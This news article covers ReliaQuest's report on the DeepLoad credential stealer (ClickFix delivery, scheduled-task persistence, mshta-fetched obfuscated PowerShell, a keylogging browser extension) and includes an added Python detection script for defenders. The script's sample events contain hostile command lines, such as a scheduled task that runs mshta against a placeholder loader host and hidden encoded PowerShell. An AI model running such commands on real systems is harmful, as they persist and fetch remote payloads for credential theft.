Researchers have uncovered a new malware strain capable of stealing credentials immediately after gaining a foothold on a victim network, capturing both stored browser passwords and live keystrokes in real time through a standalone stealer and a malicious browser extension.
What makes the malware particularly difficult to contain, according to ReliaQuest, is its likely use of AI-generated code and process injection to evade detection tools. It also incorporates a persistence mechanism that can silently re-execute even after an infected host appears fully clean.
DeepLoad Delivery via ClickFix
The authors of the malware, which ReliaQuest is tracking as "DeepLoad," are using the ClickFix social engineering technique to distribute the credential stealer in enterprise environments.
"DeepLoad steals credentials from the moment it lands, so even partial containment can still leave you with exposed passwords, session, and active accounts," ReliaQuest warned in a report this week. "Before the main attack chain finishes, a standalone credential stealer, filemanager.exe, is already running on its own infrastructure and can exfiltrate data even if the main loader is detected and blocked."
In addition, the browser extension that the malware drops and registers can capture credentials in real time as users type them, and it persists across browser sessions until explicitly removed, the security vendor said.
As with most ClickFix scams, the attack chain begins with users receiving fake browser prompts asking them to execute a seemingly benign command to "fix" some kind of made-up "error." In this instance, the command immediately creates a scheduled task to re-execute the loader, so it persists across reboots or partial detection without the user having to do anything thereafter. The malware then uses mshta.exe, a legitimate Windows utility, to communicate with the attacker's infrastructure and download a heavily obfuscated PowerShell loader.
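The chain described above (a scheduled task that re-launches the loader, mshta.exe fetching remote content, and a hidden or encoded PowerShell child) leaves a recognisable trail in process-creation telemetry. The following detection logic is an added example written for this article, not code from ReliaQuest or from the report; it runs over a handful of constructed Sysmon-style process events (timestamp, parent image, image, command line) with placeholder host names, tags the individual suspicious steps, and then correlates the persistence and download steps within a time window so a single noisy event does not have to carry the whole verdict.

```python
import re
from dataclasses import dataclass, field
from datetime import datetime

# Constructed sample of process-creation events (Sysmon Event ID 1 style,
# reduced to timestamp|parent|image|command line). These are NOT logs from
# the ReliaQuest report; loader.example is a placeholder host name.
SAMPLE_EVENTS = [
    "2024-01-01T10:00:01|explorer.exe|cmd.exe|cmd.exe /c dir",
    '2024-01-01T10:00:05|explorer.exe|schtasks.exe|schtasks.exe /create /sc minute /mo 5 /tn Updater /tr "mshta.exe https://loader.example/p" /f',
    "2024-01-01T10:00:06|explorer.exe|mshta.exe|mshta.exe https://loader.example/p",
    "2024-01-01T10:00:08|mshta.exe|powershell.exe|powershell.exe -w hidden -ep bypass -enc SQBFAFgA",
    '2024-01-01T10:05:00|svchost.exe|schtasks.exe|schtasks.exe /create /tn Backup /tr "C:\\Tools\\backup.exe" /sc daily',
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Script hosts that a scheduled task should rarely need to re-launch on a workstation.
LOLBIN_RE = re.compile(r"mshta|powershell|wscript|cscript|rundll32", re.IGNORECASE)
# Hidden window or encoded command line: common traits of an obfuscated loader.
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-(e|ec|enc|encodedcommand)\s", re.IGNORECASE)


@dataclass
class Event:
    ts: datetime
    parent: str
    image: str
    cmdline: str
    tags: list = field(default_factory=list)


def parse_event(line):
    """Split one constructed log line into its four fields."""
    ts, parent, image, cmdline = line.split("|", 3)
    return Event(datetime.fromisoformat(ts), parent.lower(), image.lower(), cmdline)


def classify(ev):
    """Attach a tag for each individual step of the chain the event matches."""
    cmd = ev.cmdline
    if ev.image == "mshta.exe" and URL_RE.search(cmd):
        ev.tags.append("mshta_remote_content")
    if ev.image == "schtasks.exe" and "/create" in cmd.lower() and LOLBIN_RE.search(cmd):
        ev.tags.append("schtask_reexecutes_lolbin")
    if ev.image == "powershell.exe":
        if HIDDEN_RE.search(cmd):
            ev.tags.append("powershell_hidden_or_encoded")
        if ev.parent == "mshta.exe":
            ev.tags.append("powershell_spawned_by_mshta")
    return ev.tags


def analyze(lines):
    """Parse and classify every line; returns the tagged events in order."""
    events = [parse_event(line) for line in lines]
    for ev in events:
        classify(ev)
    return events


def clickfix_chain(events, window_seconds=300):
    """True when a scheduled-task persistence step and an mshta remote fetch
    both occur within the window, i.e. the sequence described in the article."""
    persist = [e.ts for e in events if "schtask_reexecutes_lolbin" in e.tags]
    fetch = [e.ts for e in events if "mshta_remote_content" in e.tags]
    return any(abs((p - f).total_seconds()) <= window_seconds
               for p in persist for f in fetch)


if __name__ == "__main__":
    tagged = analyze(SAMPLE_EVENTS)
    for ev in tagged:
        if ev.tags:
            print(f"{ev.ts.isoformat()} {ev.image:<15} {', '.join(ev.tags)}")
    print("ClickFix-style chain detected:", clickfix_chain(tagged))
```

The per-event tags are deliberately narrow (mshta.exe with a URL argument, schtasks.exe registering a script host, PowerShell hidden or encoded and parented by mshta.exe) so that the benign schtasks.exe event registering a local backup binary stays unflagged; the correlation step is what turns two medium-confidence signals into a high-confidence finding that the persistence task was created before the loader was blocked.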
Heavily Padded Loader
ReliaQuest's analysis of DeepLoad showed its functional code is buried under thousands of lines of junk code that appeared designed to overwhelm static scanning tools and leave them with nothing to flag. The sheer volume of padding in the loader suggests that it was not written by a human author, but most likely developed by an AI model, the security vendor said.